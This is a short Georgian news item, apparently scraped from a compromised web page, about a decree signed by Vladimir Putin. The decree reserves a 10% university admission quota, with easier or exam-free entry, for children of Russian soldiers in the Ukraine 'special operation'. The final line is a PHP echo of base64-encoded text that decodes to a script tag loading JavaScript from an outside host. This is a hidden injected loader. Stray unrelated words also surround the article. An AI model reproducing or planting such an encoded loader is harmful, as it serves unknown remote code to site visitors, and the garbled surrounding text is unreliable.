celsiusi
ავერსი შნაიდერი
უკრაინაში "სპეცოპერაციაში" მონაწილე სამხედრო მოსამსახურეების შვილების უმაღლეს სასწავლებლებში მიღების კვოტების შესახებ" განკარგულებას რუსეთის პრეზიდენტმა ვლადიმერ პუტინმა ხელი მოაწერა. ინფორმაციას gazeta.ru ავრცელებს.
 
”რუსეთის ფედერაციის მთავრობამ უნდა უზრუნველყოს, რომ უმაღლესმა საგანმანათლებლო დაწესებულებებმა სპეციალური კვოტა გამოყონ იმ რუსი სამხედროებისა და შსს-ს თანამშრომლების შვილებისთვის, რომლებიც მონაწილეობენ (ან მონაწილეობდნენ) სპეციალურ სამხედრო ოპერაციაში“.– წერია განკარგულებაში
 
დოკუმენტის თანახმად, კვოტა გავრცელდება სრული რაოდენობის 10%-ზე, როგორც საბაკალავრო, ასევე, სპეციალიზებულ პროგრამებზე. ამასთან, "სპეცოპერაციის" დროს დაშავების, ან ავად გახდომის შემთხვევაში, სამხედროების შვილებს უნივერსიტეტებში მხოლოდ შიდა გამოცდების ჩაბარება დასჭირდებათ.
 
გარდაცვლილი სამხედროების და თანამშრომლების შვილებს გამოცდის გარეშე (გარდა შემოქმედებითი ან პროფესიული ორიენტაციის დავალებებისა) მიიღებენ.
918
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");